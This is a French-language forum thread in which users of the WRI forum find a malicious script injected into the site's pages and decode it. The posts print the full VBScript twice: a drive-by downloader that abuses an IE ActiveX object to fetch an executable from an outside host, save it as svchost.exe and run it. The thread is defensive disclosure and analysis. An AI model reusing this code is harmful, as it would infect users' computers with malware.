ATTENTION : "Microsoft Data Access" sur WRI ! Le r

[LeMulotNocturne]

Hello,

juste pour signaler que le problème rencontré il y a quelques mois sur WRI est de nouveau là...
Sous IE, alerte sur toutes les pages du forum pour prévenir de l'installation d'un composant "Microsoft Data Access".

Inspection rapide de la page avec Firebug : exactement le même symptôme que le coup d'avant, un script JS est chargé depuis un domaine externe à WRI (contenu du script pseudo crypté avec décriptage intégré en JS).

Je vous laisse regarder, cela ne sent pas bon du tout...

[aladdin]

humm effectivement ... il y a un script bizzard ! un certain library.js qui provient de -www.hotalk.com

et en décryptant son contenu je trouve ca :

Code: Tout sélectionner

<script language="VBScript">
on error resume next
t1= "http://"
t2= "www."
t3= "hot"
t4= "a"
t5= "tk.c"
t6= "om/eventlog"
t7= ".exe"

tcsafe = t1&t2&t3&t4&t5&t6&t7
i11="o"
i12="bj"
i13="ect"
i1=i11&i12&i13
i21="cl"
i22="ass"
i23="id"
i2= i21&i22&i23
i31="clsid:BD"
i32="96C5"
i33="56-6"
i34="5A3-1"
i35="1D0-9"
i36="83A-00C"
i37="04FC2"
i38="9E36"
i3=i31&i32&i33&i34&i35&i36&i37&i38

i41="Micros"
i42="oft.XML"
i43="HTTP"
i4=i41&i42&i43

i51="Shel"
i52="l.App"
i53="lication"
i5=i51&i52&i53

i61="Scri"
i62="pt"
i63="ing.FileS"
i64="ystemObject"
i6=i61&i62&i63&i64

sub doit(i5,Y9)
set Ye = Yc.createobject(i5,"")
dd="open"
Ye.ShellExecute Y9,BBS,BBS,dd,0
end sub

Set Yc = document.createElement(i1)
Yc.setAttribute i2, i3

Yi=i4
Set Yd = Yc.CreateObject(Yi,"")
b1="Adod"
b2="b."
b3="Stre"
b4="am"
b5=b1&b2&b3&b4
Yg=b5
set Ya = Yc.createobject(Yg,"")
Ya.type = 1
Yh="GET"
Yd.Open Yh, tcsafe, False
Yd.Send
Y91="s"
Y92="vchos"
Y93="t.e"
Y94="xe"
Y9=Y91&Y92&Y93&Y94

set Yb = Yc.createobject(i6,"")
set Ye = Yb.GetSpecialFolder(2)
Ya.open
Y9= Yb.BuildPath(Ye,Y9)
Ya.write Yd.responseBody
Ya.savetofile Y9,2
Ya.close
call doit(i5,Y9)
</script>


sur les premières lignes du code on peu bien lire :

-http://www.hotatk.com/eventlog.exe

un exe ! ...


des explications ??

[LeMulotNocturne]

Ca pu grave...
Un script qui lance un process "svchost.exe", humm.... si c'est pas un virus ou un troyen je me les c.....

[aladdin]

heuu je n'irai pas à conclure tout de suite ... mais une chose est sure, ce machin tente de lancer un executable.

la question est : comment ce script a pu arriver sur WRI ?? une pub ?

[SqTH]

En effet, sous IE, sophos a hurlé.
Rien sous Firefox.

[aladdin]

comme vous pouvez le voir c'est un vbscript donc sous FF ca ne risque pas de s'exécuter ...

[aladdin]

plus aucun doute, c'est un virus/malware qui tente de s'installer en tentant deux exploits IE avec ajax et adobe

voici le script que j'ai un peu décrypter pour y voir plus claire

Code: Tout sélectionner

<script language="VBScript">
on error resume next

tcsafe = http://www.hotatk.com/eventlog.exe

i1=object
i2= classid
i3=clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
i4=Microsoft.XMLHTTP
i5=Shell.Application
i6=Scripting.FileSystemObject

sub doit(i5,Y9)
set Ye = Yc.createobject(i5,"")
dd="open"
Ye.ShellExecute Y9,BBS,BBS,dd,0
end sub

Set Yc = document.createElement(i1)
Yc.setAttribute i2, i3

Yi=i4
Set Yd = Yc.CreateObject(Yi,"")
Yg="Adodb.Stream"
set Ya = Yc.createobject(Yg,"")
Ya.type = 1
Yh="GET"
Yd.Open Yh, tcsafe, False
Yd.Send
Y9="svchost.exe"

set Yb = Yc.createobject(i6,"")
set Ye = Yb.GetSpecialFolder(2)
Ya.open
Y9= Yb.BuildPath(Ye,Y9)
Ya.write Yd.responseBody
Ya.savetofile Y9,2
Ya.close
call doit(i5,Y9)
</script>


je me demande toujours comment ca a pu atterrir sur WRI ??


une chose est sure, si vous n'avez pas un antivirus et que vous avez ouvert WRI avec internet explorer vous êtes infecté ...
en attendant l'intervention de l'admin, y'aurai t il un moyen pour mettre une petite alerte quelque part ?

[LeMulotNocturne]

une chose est sure, si vous n'avez pas un antivirus et que vous avez ouvert WRI avec internet explorer vous êtes infecté ...

pas forcement, je suis sous IE7 et c'est bien le navigateur qui a hurlé le premier (sécurité contre les install sous IE7).

en attendant l'intervention de l'admin, y'aurai t il un moyen pour mettre une petite alerte quelque part ?

recommander ce topic ?

[aladdin]

une reco ...

en attendant Olivier ...

[SqTH]

Un bref coup d'oeil au code et je vois que le script ewst appellé dans une DIV de xiti... oO

[aladdin]

oui mais à mon avis ca ne doit pas être xiti mais un script php qui permet de gérer les tags sur WRI qui doit être concerné (Confirmation de l'admin ??) .

car ca sent plus l'injection de code qu'une infection au niveau de xiti ...

[WebRankInfo]

je vais regarder ça merci de m'avoir prévenu

[manHa]

Euh et si j'ai fais Activer le controlX? Si j'ai cliqué?

[e-kiwi]

un seul mot : AIE

[arnaudmn]

Ca le fait encore ou pas ? Parce que je vois rien ...